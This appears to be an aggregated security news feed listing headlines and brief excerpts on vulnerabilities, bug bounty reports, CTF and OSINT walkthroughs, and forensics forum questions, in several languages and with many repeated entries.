    🔍 Introduction Insecure Deserialization은 직역한 그대로 안전하지 않은 역직렬화를 의미합니다. Deserialization 시 개발자가 의도하지 않은 Object 까지 Deserialize하여 비즈니스 로직상의 문제를 발생시키거나, 조건에 따라서는 어플리케이션이 공격자가 의도한 코드를 수행하게끔 구성할 수 있어 리스크가 높습니다. 먼저 Serialization/Deserialization 을 알아보면 보통 개발 과정에서 메모리에 있는 Object를 파일 등 외부의 데이터로 변환하는 과정을 Serialization, 반대로 파일 등 외부에 있는 데이터를 프로그램 내 Object로 변환하는 과정을 Deserialization이라고 합니다. 🗡 Offensive techniques Detect Deserialization은 소스코드를 보지 않은 상태에선 명확하게 Deserialization 프로세스라고 확신하기 어렵습니다.
    OWASP ZAP
    Introduction ZAP(Zed Attack Proxy)은 OWASP의 Flagship 프로젝트로 Vulnerability Assessment, Penetration Testing, Runtime Testing, Code Review를 위한 보안 테스팅 도구이자 취약점 스캐너입니다. Burpsuite와 함께 보안 엔지니어, 버그바운티헌터 등의 주력 도구로 사용되고 있고, Cli command, REST API 그리고 Jenkins plugin, Github action 등을 제공하고 있어 DevSecOps 즉 CI/CD Pipeline 상에서의 DAST 스캐너로도 많이 사용되고 있습니다. 개인적으로 정말 좋아하는 프로젝트입니다. 다른건 몰라도 Fuzzer / Scripting은 비교할 수 있는 도구가 없습니다. 최고에요! Installation 아래 URL에서 각 OS 맞는 Installer 패키지를 통해 설치하시면 됩니다.
  • Open

    Self XSS in Create New Workspace Screen
    Mattermost disclosed a bug submitted by rynexxx: https://hackerone.com/reports/1442017 - Bounty: $50
  • Open

    The Red Cross Data Breach Exploited a ManageEngine Vulnerability by APT27
    Article URL: https://www.thecybersecuritytimes.com/the-red-cross-data-breach-exploited-a-manageengine-vulnerability-by-apt27/ Comments URL: https://news.ycombinator.com/item?id=30403952 Points: 1 # Comments: 1  ( 4 min )
  • Open

    Red Team Engagement Planning
    A short article outlining the phases to go through, while planning a red team engagement. Continue reading on Medium »  ( 2 min )

  • Open

    Privilege Escalation Vulnerability in Snapd
    Article URL: https://ubuntu.com/security/notices/USN-4728-1 Comments URL: https://news.ycombinator.com/item?id=30401324 Points: 1 # Comments: 0  ( 2 min )
  • Open

    Printer assigned a drive letter in Windows
    Has anyone else come across a printer that was assigned a drive letter? I’ve never seen this in my personal life but it stood out to me while I was working a case. In this instance, it was a Brother printer assigned to D:. Does doing this provide any additional functionality rather than just printing documents? submitted by /u/ebarboza311 [link] [comments]  ( 1 min )
    Missing $UsnJrnl
    Hi guys what can be the reason to not have a $UsnJrnl on an NTFS filesystem? submitted by /u/Donato_Francesco [link] [comments]  ( 1 min )
  • Open

    Le guide ultime pour améliorer ses recherches concurrentielles sur Google
    Vous souhaitez améliorer vos requêtes lors d’une recherche sur votre concurrent ou sur votre marché ? Continue reading on Medium »  ( 3 min )
    Phishing Domain Tool — DnsTwist Part 2
    Dnstwist is an open-source tool used to identify phishing domains, Typosquatting domains, attack domains, and brand impersonate. Dnstwist… Continue reading on Medium »  ( 1 min )
    Walkthrough — Hacktoria: Geolocation 12
    And back again with another Hacktoria Geolocation challenge to solve. I love GEOINT challenges, especially when they force me to learn… Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    "The installation of this device is forbidden by system policy"
    I keep getting these notifications without me trying to install any new device or driver. I would like to know what is the source of this? I tried to look into my event viewer without success. submitted by /u/ak_z [link] [comments]  ( 1 min )
    Small matter: A Malwarebytes Privacy Guard and Privacy Badger basically doing the same thing. I've had a problem with my browser sticking and it might be conflicting extensions.
    Thank you. submitted by /u/jacobspartan1992 [link] [comments]  ( 1 min )
    Which framework should I learn or at least get familiar with first? (Ghidra, IDA, Radare2)
    Hey Chief, I'm trying to get ahead in reversing binaries, and I really ain't got any idea about which framework should I pick up first, Can you help? submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    Soc 2 report
    Why SOC 2 report are made by CPA ? For SOC 1 I get it, but not SOC 2. How can they audit IT security being accountant? submitted by /u/Xctzn [link] [comments]  ( 2 min )
  • Open

    Windows Privilege Escalation: PrintNightmare
    Introduction Print Spooler has been on researcher’s radar ever since Stuxnet worm used print spooler’s privilege escalation vulnerability to spread through the network in nuclear The post Windows Privilege Escalation: PrintNightmare appeared first on Hacking Articles.  ( 9 min )
  • Open

    Windows Privilege Escalation: PrintNightmare
    Introduction Print Spooler has been on researcher’s radar ever since Stuxnet worm used print spooler’s privilege escalation vulnerability to spread through the network in nuclear The post Windows Privilege Escalation: PrintNightmare appeared first on Hacking Articles.  ( 9 min )
  • Open

    SecWiki News 2022-02-19 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-19 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Querying Spotlight APIs With JXA
    TL;DR This blog post takes a brief look at how to use JXA (native JavaScript for Automation on macOS) to query Spotlight APIs. In… Continue reading on Medium »  ( 3 min )
    Attacktive Directory — THM
    Attacktive Directory is a box hosted on Try Hack Me. This is medium rated box, but great for any new Red Team Member or penetration… Continue reading on Medium »  ( 2 min )
  • Open

    Directory Traversal — what is it?
    Local File inclusion Continue reading on System Weakness »  ( 3 min )
    PORTSWIGGER WEB SECURITY - SSRF (SERVER SIDE REQUEST FORGERY) LAB ÇÖZÜMLERİ
    Bir web uygulamasında kullanılan veriler dış bir kaynak aracılığıyla alınıyorsa ve saldırgan web sunucusunun göndermiş olduğu istek… Continue reading on Medium »  ( 7 min )
  • Open

    Certipy 2.0: BloodHound, New Domain Privilege Escalation Techniques, Shadow Credentials, Golden Certificates, and more!
    submitted by /u/ly4k_ [link] [comments]
  • Open

    Certipy 2.0: BloodHound, New Domain Privilege Escalation Techniques, Shadow Credentials, Golden Certificates, and more!
    submitted by /u/ly4k_ [link] [comments]  ( 1 min )
  • Open

    pictures of people playing motorcycle soccer
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)
    submitted by /u/digicat [link] [comments]
  • Open

    Lazarus 组织开始使用 lolbin 技术
    研究人员发现了 Lazarus 的新攻击行动,利用国防部门的就业岗位信息进行诱饵钓鱼。
  • Open

    Expat library: libexpat 2.4.5 (CVE fixes)
    Article URL: https://github.com/libexpat/libexpat/blob/R_2_4_5/expat/Changes Comments URL: https://news.ycombinator.com/item?id=30393397 Points: 1 # Comments: 0  ( 21 min )

  • Open

    Microsoft Brings eBPF to Windows unlocking security and networking use cases
    submitted by /u/markcartertm [link] [comments]  ( 1 min )
    Personnel Security, Separation of Duties, Least Privilege, Need to Know, Vendor, Consultant and Contractor Controls, Security Governance, Risk Management
    submitted by /u/Tradition_Wonderful [link] [comments]
    Oh Snap! More Lemmings (Local Privilege Escalation in snap-confine)
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    AWS GuardDuty Exfiltration Bypass with VPC Endpoints
    submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
    Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)
    submitted by /u/digicat [link] [comments]
    Extensis Portfolio - Remote Code Execution Vulnerability Disclosure
    submitted by /u/hashput1n [link] [comments]
  • Open

    What is it like to work a computer forensics job?
    How is working for a computer forensics job like? Is it easy as simple as just plugging a hard drive or phone or anything that needs data recovery to retrieve data back or is it much harder and more work? Just wondering because i am a computer science major currently a freshman I might want to do computer forensics because it interests me. submitted by /u/Ill-Date-1852 [link] [comments]  ( 2 min )
    Where do deleted browser history go to?
    I know when u delete something, it never really gets deleted. So just curious, where does cleared browsing history for chrome/safari go to? and are we able to retrieve it? submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    How do you really get into incident response
    I have recently graduated from college with a Bachelors in df but the school I went to really was more geared towards what police officers deal with (like criminal activity and all). How should I really go about learning more of the incident response side of forensics? Any good references to YouTube channels, textbooks, websites, etc is much appreciated! submitted by /u/JunketThat2134 [link] [comments]  ( 5 min )
  • Open

    eCPTX Exam Review
    eLearnSecurity Certified Penetration Tester eXtreme Continue reading on The Mayor »  ( 4 min )
    AWS GuardDuty Exfiltration Bypass
    In January 20, 2022 Amazon AWS has introduced a new threat detection in GuardDuty to block credential exfiltrations. Can be bypassed? Continue reading on Dev Genius »  ( 4 min )
    AWS GuardDuty Exfiltration Bypass
    In January 20, 2022 Amazon AWS has introduced a new threat detection in GuardDuty to block credential exfiltrations. Can be bypassed? Continue reading on Medium »
  • Open

    Is it possible to bulk download?
    So there's an album I'm wanting to download from an OD (Queen's complete Platinum Collection which includes over 200 mins of music) and I'm wanting to know if there is a way to go and bulk download all the files without having to press a link, right click, and click "Save audio as..." every time. submitted by /u/Raven_Claw7621 [link] [comments]  ( 1 min )
    Software (Not Tested)
    https://fichiers.meca.polymtl.ca/?hidden submitted by /u/CalmWater8439 [link] [comments]
    Quake 3 Arena/OpenArena maps and other goodies
    submitted by /u/SpaceOtterMafia [link] [comments]  ( 1 min )
    Best way to limit results by language?
    Greetings! I am currently new to the ussage of open directories and have been wondering how to limit my results for a movie for example to only my language. I am useing the "all resourves i know" guide to construct my searches. Example: intext:"Search Term" intitle:"index.of" +(wmv|mpg|avi|mp4|mkv|mov) -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) The Guide: https://www.reddit.com/r/opendirectories/comments/933pzm/all_resources_i_know_related_to_open_directories/ submitted by /u/TwinkleTheToothFairy [link] [comments]  ( 1 min )
  • Open

    Severe Vulnerability Fixed in UpdraftPlus 1.22.3
    Article URL: https://jetpack.com/2022/02/17/severe-vulnerability-fixed-in-updraftplus-1-22-3/ Comments URL: https://news.ycombinator.com/item?id=30391454 Points: 1 # Comments: 1  ( 4 min )
    Local root vulnerability in snap-confine
    Article URL: https://lwn.net/Articles/885195/ Comments URL: https://news.ycombinator.com/item?id=30381169 Points: 2 # Comments: 0  ( 10 min )
  • Open

    Hacking the marketplace
    Guys! This room it’s great and I had a lot of fun, with this room you can learn this: Continue reading on System Weakness »  ( 2 min )
    Recon and YouTube, is that a thing?
    Hey fella hunters, hope you all are doing fine. This is my first ever blog, I will try to keep it as much simple as possible spilling as… Continue reading on Medium »  ( 4 min )
    How i was able To hack Cambridge University ( Arabic )
    السلام عليكم معاكم اخوكم ناصر , بسبب دعمكم السابق لي قررت اكتب هذي المقالة Continue reading on Medium »  ( 1 min )
    Bug Zero is Going to Pay Your Security Bill for 2022
    tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats. Continue reading on Bug Zero »  ( 2 min )
    Bug Bounties in Sri Lanka
    tl;dr — Bug Zero is a Sri Lanka based Bug Bounty platform and is here to help secure your organization from cybersecurity threats. Continue reading on Bug Zero »  ( 5 min )
    Cardano Foundation Doubles Reward Offered to Hackers for Uncovering Bugs on Its Blockchain
    Continue reading on Medium »  ( 2 min )
    Вынікі аўдыта бяспекі Firefly
    Арыгінал:https://firefly.exchange/blog/results-from-firefly-security-audits Continue reading on Medium »  ( 2 min )
    I’ve made over $588k on Bug Bounty so far
    How much one can earn on Bug Bounty? Continue reading on Medium »  ( 1 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters, Continue reading on InfoSec Write-ups »  ( 2 min )
    Starswap’s Second Bug Bounty Program
    Starswap is already live on Starcoin’s test network, barnard, as the first step in realizing our ambitious vision of a fully functional… Continue reading on Medium »  ( 1 min )
  • Open

    Android
    VK.com disclosed a bug submitted by executor: https://hackerone.com/reports/1343528 - Bounty: $3000
  • Open

    Attackers Abuse Poorly Regulated Top-Level Domains in Ongoing Redirect Campaign
    One of the more common infections that we see are site-wide redirects to spam and scam sites, achieved by attackers exploiting newly found vulnerabilities in popular WordPress plugins. If you’ve ever been redirected to a page that looks something like this, then you’ve fallen victim to such an attack: Once the user clicks through the verification process they are sent to a fake CAPTCHA page asking the user to click to prove they are a human: As we have reported in the past on this type of infection: The goal is to trick visitors into clicking “Allow” when the site asks to subscribe to push notifications. Continue reading Attackers Abuse Poorly Regulated Top-Level Domains in Ongoing Redirect Campaign at Sucuri Blog.
  • Open

    Free cybersecurity frameworks to try?
    I am just looking around to see if there are any more frameworks I can use to harden our systems. I have already been using the STIG and CIS tools and are about 85% compliant on both. Are there any more free resources I can use to scan against our machines to see if there is anything else I can do to harden them? Thanks submitted by /u/KillingRyuk [link] [comments]  ( 2 min )
    I believe my files were stolen whilst connected to a hacker's personal network, but something doesn't add up. [NSFW]
    So, a friend of mine is in Cybersecurity. I study Cybersecurity and am less advanced in my journey than he is. He's very much into fraud, malware, spyware, etc. So, a few background things - I have anorexia nervosa. He knows this. We have been friends for over 3 years now. We are friends with benefits. We are both meth addicts and I'm heavily dependant on weed. I have an album on my phone containing all my bodychecks. It is stored in the main SD card directory. I have a Samsung Galaxy S20 5G, running Android 11. So one day, he invited me over to record a sex tape. Okay, whatever. So I went to his house, ended up sucking his dick, he finishes. We chat for a bit, I'm in his loungeroom on his couch for a an hour or so. At one point early on I mention that I am downloading a large file onto my phone. He asks if I want to use his Wi-Fi, and I accept. When I'm connecting, he convinces me to use my phone MAC address. Okay. I try to browse the Internet while I wait but the connection is garbage. I recieve a text from our other friend who wants to buy weed off me. He immediately ushers me out the door despite suggestions of a Round 2 earlier. Later that night, I notice that when posting to my Instagram, all the recent photos are my bodychecks. Despite me not having touched that folder at all in the past six months. All the photos are there, twice - in my recent photos and where they originally were. I cannot find any duplicate albums on my phone that would cause this. This all happened last week, but the files were modified again last night. Should I be worried? submitted by /u/856850835 [link] [comments]
    Security Metrics
    So I'm working on a security project now and we have a bunch of issues that need fixing over a number of areas and I need a way of prioritising these items and showing that the security of the system is improving. Normally you would use CVSS to calculate this however this program won't be dealing with just vulnerabilities in the product but also in operations and governance. How do you prioritise updating a library in your product with an RCE against a GDPR issue or an internal tool with weak password policies? Also how do you score the system overall to show that fixing these issues has improved the overall security posture? submitted by /u/dbxp [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-18 Review
    利用IP分片污染攻击TCP流量 by ourren “红蓝对抗演练评分系统”开源框架 (preview) by ourren Web框架CSRF防御的有效性 by ourren PRIVGUARD:用于GDPR隐私合规的数据治理框架 by ourren 中间商之 Ntlm Relay 攻击分析 by ourren 网络安全工作你必须懂的"3保1评" by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-18 Review
    利用IP分片污染攻击TCP流量 by ourren “红蓝对抗演练评分系统”开源框架 (preview) by ourren Web框架CSRF防御的有效性 by ourren PRIVGUARD:用于GDPR隐私合规的数据治理框架 by ourren 中间商之 Ntlm Relay 攻击分析 by ourren 网络安全工作你必须懂的"3保1评" by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Hacktoria: Geolocation 10 (Walkthrough)
    Hacktoria: Geolocation 10 (Walkthrough) Continue reading on Medium »  ( 2 min )
    Hacktoria: Geolocation 10 (Walkthrough)
    Hacktoria: Geolocation 10 (Walkthrough) Continue reading on Medium »  ( 1 min )
    Tattoos for Buildings — OSINT Challenge 17
    On Jan 24, 2022, Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out when… Continue reading on Medium »  ( 2 min )
    OSINT: How extract text From an Image or Video
    Did every wonder what a piece of foreign text means on a sign, banner, or in a video. Sure you can type it into google translate or speak… Continue reading on Medium »  ( 2 min )
  • Open

    How Netsparker can help with AppSec compliance
    Demonstrating web application compliance with various security standards and practices is crucial in many industries. To help you scan applications and prepare reports for common web security compliance requirements, Netsparker by Invicti comes with a host of predefined compliance checks and reports, including OWASP Top 10, PCI DSS, HIPAA, NIST SP 800-53, and more. READ MORE  ( 7 min )
  • Open

    Just 7 Days Left for IWCON2022. Have You Registered Yet?
    Infosec Writeups is Organizing Our First Virtual Conference and Networking Event — and we want you to be a part!  ( 3 min )
    CyberDefenders Qradar101 Write-up
    This write-up is based on Cyberdefenders Qradar101 challenge from Ali Alwashali.  ( 7 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
  • Open

    Just 7 Days Left for IWCON2022. Have You Registered Yet?
    Infosec Writeups is Organizing Our First Virtual Conference and Networking Event — and we want you to be a part!  ( 3 min )
    CyberDefenders Qradar101 Write-up
    This write-up is based on Cyberdefenders Qradar101 challenge from Ali Alwashali.  ( 7 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
  • Open

    Just 7 Days Left for IWCON2022. Have You Registered Yet?
    Infosec Writeups is Organizing Our First Virtual Conference and Networking Event — and we want you to be a part!  ( 3 min )
    CyberDefenders Qradar101 Write-up
    This write-up is based on Cyberdefenders Qradar101 challenge from Ali Alwashali.  ( 7 min )
    How I took over the Manager’s account in Bus Booking website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
  • Open

    FreeBuf早报 | Meta因隐私案赔付九千万美元;谷歌推新隐私保护政策
    Facebook 母公司 Meta 同意支付 9000 万美元,以了结一场十年前的诉讼案件。  ( 1 min )
    一种基于Golang的僵尸网络正在成为新的威胁
    近日,网络安全研究人员破解了一种名为Kraken的新型僵尸网络。该僵尸网络是基于Golang语言开发的,黑客们正在积极对它进行优化升级。
    谷歌宣布将在安卓系统内引入“隐私沙盒”
    谷歌周三宣布,计划将隐私沙盒引入安卓系统,以期将既注重隐私、又不会对用户造成干扰的广告技术扩展到移动网络。
    勒索软件猖獗,2021 年检测到 6.23 亿次
    物联网恶意软件、加密威胁和加密劫持等都保持了全年的高速增长。  ( 1 min )
    FreeBuf周报 | 国际互联网协会数据泄露;乌克兰遭大规模DDoS攻击
    乌克兰国家安全机构(SSU)宣称,此次针对乌克兰的网络攻击,是有预谋,有组织、背后有庞大“黑手”的具体行动。  ( 1 min )
    黑客潜入Microsoft Teams发送恶意软件
    黑客利用Microsoft Teams,并在聊天里传播恶意可执行文件。
    百密一疏,透明部落与SideCopy共用基础设施露出马脚
    Quick Heal披露了一起针对印度国防军和武装部队陆军人员的窃密行动并将其命名为Operation SideCopy。
    FreeBuf甲方群话题讨论 | 聊聊企业安全运营中的个人数据隐私
    作为企业的安全部门,确保企业安全稳定运作的同时,如何保护平台数据时代下每个“透明人”的隐私数据安全?
    巨头让步!Meta 将支付 9000 万美元
    案件指控 meta 使用 cookies 追踪已退出账号的 Facebook 用户。  ( 1 min )
    你的跳蛋,黑客们表示很感兴趣
    跳蛋、按摩棒是你深夜的好伙伴,它们可能也在偷偷泄露着你的使用数据。  ( 1 min )
  • Open

    Why symbolic execution is the leading-edge method for generating test values
    In the first blog post of our blog series on Symflower’s Core Technology, we explained how symbolic execution works and how we apply it to… Continue reading on Medium »  ( 5 min )
  • Open

    Why symbolic execution is the leading-edge method for generating test values
    In the first blog post of our blog series on Symflower’s Core Technology, we explained how symbolic execution works and how we apply it to… Continue reading on Medium »  ( 5 min )
  • Open

    Watch "C0V3RT - "Just For Fun" Challenge Lock (Picked & Gutted)" on YouTube
    submitted by /u/Can0pen3r [link] [comments]
  • Open

    Internals of Go's new fuzzing system
    Article URL: https://jayconrod.com/posts/123/internals-of-go-s-new-fuzzing-system Comments URL: https://news.ycombinator.com/item?id=30380994 Points: 2 # Comments: 0  ( 6 min )

  • Open

    Would you support brain forensics (mind reading)
    Poll View Poll submitted by /u/themariocrafter [link] [comments]  ( 1 min )
    Who is running sysmon on workstations and forwarding to SIEM?
    Hi Just wondering if any enterprise size companies are running sysmon on workstation and/or servers and forwarding the event to some sort of logger/SIEM? What are the pros and cons? submitted by /u/antmar9041 [link] [comments]  ( 1 min )
    PDF Analysis for adult content
    I have a PDF that consists of ~27,000 pages and >42,000 images (it's a Cellebrite extraction report from an iPhone). I need to know how many of the images are "adult" in nature. I know Google (https://cloud.google.com/vision/docs/detecting-safe-search) and Microsoft (https://docs.microsoft.com/en-us/azure/cognitive-services/computer-vision/concept-detecting-adult-content) both have "A.I." based image filtering API's that can automatically scan images and find adult/gore/explicit images, but I'm not aware of any software that leverages these technologies (or something similar). What I'm looking for: 1. The best way to dump this many images from a PDF file, and 2. The best way to scan that dump for explicit images (or a way to just scan the PDF file directly and skip dumping the images). submitted by /u/agrowland [link] [comments]  ( 3 min )
  • Open

    How to track vehicles using Open Souce Imagery
    Vehicle information can be fantastic tool for investigators to scrutinize and track a real world target, but what OSINT opportunities can… Continue reading on Medium »  ( 2 min )
    Hacktoria: Geolocation 14 (Walkthrough)
    Hacktoria: Geolocation 14 (Walkthrough) Continue reading on Medium »  ( 3 min )
    Hacktoria: Geolocation 14 (Walkthrough)
    Hacktoria: Geolocation 14 (Walkthrough) Continue reading on Medium »  ( 2 min )
    Solving Dojo’s geolocation quiz
    One day, when I was surfing the internet, my twitter push me a tweet, lets see what does the tweet write: Continue reading on Medium »  ( 2 min )
    OSINT Tool - CarNet.ai
    The best tool to (correctly!) identify a vehicle’s brand and model using AI. Continue reading on Medium »  ( 2 min )
  • Open

    Why should you not send sensitive data over email
    Currently the company I work for sends sensitive documents over email.They Password protect them but then send the password also using email format. submitted by /u/Linux98 [link] [comments]  ( 3 min )
    Is it safe to send my SSN over email to a Loan officer email, since she will need it to open up my credit report?
    My mom and I in the process of trying to buy an apartment together. Mom will put it under my name. This is first time im doing this and she told me i needed to email my SSN to the loan officer. I have protonmail which is secure mail and is encrypted email. Would it be safe to send my SSN over email to the loan officer in this case since she would need it to open my credit report. I do not know if the officer loan email is encrypted or not Or should i give her my SSN in another way such as telling her on the phone call to be on the safe side? or would be email be just fine? submitted by /u/Wastedmess [link] [comments]  ( 3 min )
    Regarding changing passwords and NIST (My google-fu is failing me)
    NIST states in NIST Special Publication 800-63B under section 5.1.1.2 Memorized Secret Verifiers that: "Verifiers SHOULD NOT impose other composition rules (e.g., requiring mixtures of different character types or prohibiting consecutively repeated characters) for memorized secrets. Verifiers SHOULD NOT require memorized secrets to be changed arbitrarily (e.g., periodically). However, verifiers SHALL force a change if there is evidence of compromise of the authenticator. " I'm a real stickler and was wondering if anyone knows what main research papers or investigations made them come to the recommendations above? Additionally are there any respected research authority on these type of questions in IT-sec? Thanks! submitted by /u/someuserman [link] [comments]  ( 3 min )
    Company Phone in Sealed Box - Possible to be Monitored?
    Just got my company phone and it’s brand new in the sealed manufacturers box and even has the carriers sticker on it still. Is there any possible way my company could be monitoring my activity on this phone beyond the calls being made and quantity of texts/data usage? submitted by /u/sektrONE [link] [comments]  ( 3 min )
  • Open

    Self-Testing: Red Team Augmentation
    Red Team testing and Penetration testing are key controls to utilize as part of maintaining a mature security program. There is the… Continue reading on Medium »  ( 5 min )
  • Open

    Local Privilege Escalation Vulnerability Discovered snap-confine(CVE-2021-44731)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731 Comments URL: https://news.ycombinator.com/item?id=30378103 Points: 2 # Comments: 1  ( 5 min )
    Zabbix SAML Authentication Bypass (CVE-2022-23131) and more
    Article URL: https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage/ Comments URL: https://news.ycombinator.com/item?id=30372198 Points: 2 # Comments: 0  ( 9 min )
  • Open

    Local Privilege Escalation Vulnerability Discovered snap-confine(CVE-2021-44731)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731 Comments URL: https://news.ycombinator.com/item?id=30378103 Points: 2 # Comments: 1  ( 5 min )
    T2 Mac security vulnerability means passwords can now be cracked
    Article URL: https://9to5mac.com/2022/02/17/t2-mac-security-vulnerability-passware/ Comments URL: https://news.ycombinator.com/item?id=30374224 Points: 32 # Comments: 6  ( 4 min )
  • Open

    Top 10 API Bugs — Where To Find Them
    Ladies and Gentlemen, let’s do some API hacking today. I will discuss some of the top 10 API bugs and where one can find them. Continue reading on Medium »  ( 5 min )
    403 forbidden bypass & Accessing config files using a header
    This is my first writeup on how i bypass 403 & accessed the config file Continue reading on Medium »  ( 1 min )
    Beginner’s Guide to Bug Bounty Hunter
    How much money can you make as a bug bounty hunter? That’s the burning question on everyone’s mind, and it’s one that will take some time… Continue reading on Medium »  ( 3 min )
    Apple pays $100,500 to a student who discovered Mac webcam vulnerability
    Ryan Pickren, a cyber security student was awarded $100,500 (around 75 lakhs) as a bounty, after he showed Apple how a vulnerability… Continue reading on Medium »  ( 2 min )
    Bug Bounty: Should You Go Full-Time?
    In the comments, I was asked what turned out to be more profitable in terms of money as a result — my previous job as a developer or… Continue reading on Medium »  ( 2 min )
  • Open

    Public STIX STIX2 TAXII Threat Actor Specific Threat Intelligence Feed - Your Lifetime API Key!
    Hi, everyone, This is Dancho. Big news! I've decided to make approximately 15 years of active and unique threat actor specific research publicly accessible online for free using the OpenCTI STIX STIX2 TAXII platform and not only convert all the cool and juicy and full of never-published and discussed before niche threat actors both internationally and in Russia but also make them into a free STIX STIX2 TAXII threat intelligence feed and turn them into a machine readable format with the idea to centralize and speed up the communication of my research and potentially allow you to better catch up improve your situational awareness and learn new things about the international bad guys including the bad guys in Russia including their Internet infrastructure and catch up with who they are and w…
  • Open

    Learning secrets management in the modern world using OWASP WrongSecrets Project : Hands-on Labs, CTF style challenges
    submitted by /u/madhuakula [link] [comments]  ( 1 min )
    Exploiting Jenkins build authorization
    submitted by /u/Alternative_Tour9985 [link] [comments]
    Tutorial: Kubernetes Vulnerability Scanning & Testing KubiScan & KubeSploit
    submitted by /u/jat0369 [link] [comments]
    CVE-2022-23131 - Zabbix SAML Authentication Bypass
    submitted by /u/monoimpact [link] [comments]  ( 1 min )
    Advisory: Cisco RV340 Dual WAN Gigabit VPN Router (RCE over LAN)
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
  • Open

    SecWiki News 2022-02-17 Review
    WordPress 生态中恶意插件的大规模研究 by Avenger 2021年工业控制网络安全态势白皮书 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-02-17 Review
    WordPress 生态中恶意插件的大规模研究 by Avenger 2021年工业控制网络安全态势白皮书 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Avoiding Mixed Content Errors with an HTTPS Python Server
    Disclaimer: To set up a secure Python server, we need a domain name that we can access. 1. Introduction At some point during penetration testing, bug hunting, and capture the flag competitions, we will likely need to download a file or send a request to a server that we can access. Depending on what we... The post Avoiding Mixed Content Errors with an HTTPS Python Server appeared first on TrustedSec.  ( 9 min )
  • Open

    Subdomain Takeover of brand.zen.ly
    Zenly disclosed a bug submitted by mega7: https://hackerone.com/reports/1474784 - Bounty: $750
    Missing SPF record on trycourier.app
    Courier disclosed a bug submitted by musab_alharany: https://hackerone.com/reports/1416701
  • Open

    Weblogic HomeHandle反序列化漏洞分析和研究
    本篇文章主要是针对CVE-2022-21350的详细分析和研究,以探讨安全技术为目的。  ( 1 min )
    美国称俄罗斯国家黑客破坏了国防承包商
    据报道,俄罗斯黑客组织发动对美国CDCs的持续性攻击。  ( 1 min )
    小心了,即将推出的Chrome、Firefox100可能存在严重风险
    即将推出的 Firefox 100和 Chrome 100版本浏览器存在严重风险,在解析包含三位数版本号的用户代理字符串时可能会破坏网站。  ( 1 min )
    schoolcms 代码审计
    最近一直在研究thinkphp的框架,今天找了一个cms进⾏审计,发现了两处注入点,由此来进行分析一下。  ( 1 min )
    机器学习会成为数据安全新威胁和后门吗?
    研究机器学习和人工智能系统安全的专家警告称,未来这类系统可能被专业的攻击者所利用。  ( 1 min )
    FreeBuf早报 | 美国称俄罗斯黑客入侵多个国防部承包商;Trickbot针对60家名企客户
    红十字国际委员会(ICRC)最近遭到网络攻击,超过51.5万名“高危人群”的数据被泄露,这很可能是国家支持的黑客所为。  ( 1 min )
    打满马赛克就安全?新技术已能够从像素化图像中还原文本信息
    本周,安全公司Bishop Fox 的首席研究员从像素化的文本图像中清楚地恢复了其中的字母信息。  ( 1 min )
    2022 年值得关注的 10 家最热门 XDR 安全公司
    注:本文转自SDNLAB,仅供查阅 据研究机构 Forrester 称,扩展检测和响应 (XDR) 市场目前还处于早期阶段,现有的  ( 1 min )
  • Open

    Browser Forsensics — CyptoMiner
    Challenge Description  ( 3 min )
    Phishing: Creating and Analyzing
    Hello everyone,  ( 11 min )
    Memory Analysis — Ransomware (BlueTeamLabs)
    Challenge Description:  The Account Executive called the SOC earlier and sounds very frustrated and angry. He stated he can’t access any…  ( 3 min )
  • Open

    Browser Forsensics — CyptoMiner
    Challenge Description  ( 3 min )
    Phishing: Creating and Analyzing
    Hello everyone,  ( 11 min )
    Memory Analysis — Ransomware (BlueTeamLabs)
    Challenge Description:  The Account Executive called the SOC earlier and sounds very frustrated and angry. He stated he can’t access any…  ( 3 min )
  • Open

    Browser Forsensics — CyptoMiner
    Challenge Description  ( 3 min )
    Phishing: Creating and Analyzing
    Hello everyone,  ( 11 min )
    Memory Analysis — Ransomware (BlueTeamLabs)
    Challenge Description:  The Account Executive called the SOC earlier and sounds very frustrated and angry. He stated he can’t access any…  ( 3 min )

  • Open

    Broken Authentication Session Token Bug
    Courier disclosed a bug submitted by the_hacker_girl: https://hackerone.com/reports/948345
  • Open

    Company refuses to provided any training for our SOC
    Since joining multiple analysts have requested some type of training whether it’s vendor specific for tools like the SIEM or vendor neutral training such as SANS but management keeps saying our department is “self-taught” and there is no training budget. Which is odd considering how big of a corporation it is and how successful it is. Personally I’m shocked as the companies I’ve worked for in the past all provided some type of training. How can I make a compelling case for getting our SOC analysts training? submitted by /u/bankster24 [link] [comments]  ( 2 min )
    what are some affordable and credible penetration testing certifications?
